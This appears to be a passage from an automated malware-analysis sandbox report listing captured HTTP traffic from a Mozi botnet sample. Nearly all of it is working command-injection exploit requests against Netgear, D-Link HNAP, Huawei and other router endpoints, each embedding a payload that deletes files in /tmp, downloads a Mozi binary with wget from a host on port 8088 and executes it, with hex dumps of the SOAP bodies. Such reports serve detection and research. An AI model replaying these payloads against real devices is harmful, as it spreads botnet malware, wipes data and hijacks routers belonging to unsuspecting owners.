30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 198.44.152.160:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 83.88.254.107:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 65.249.14.155:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 165.106.2.118:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 151.95.79.143:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 65.241.205.91:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 193.149.60.69:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
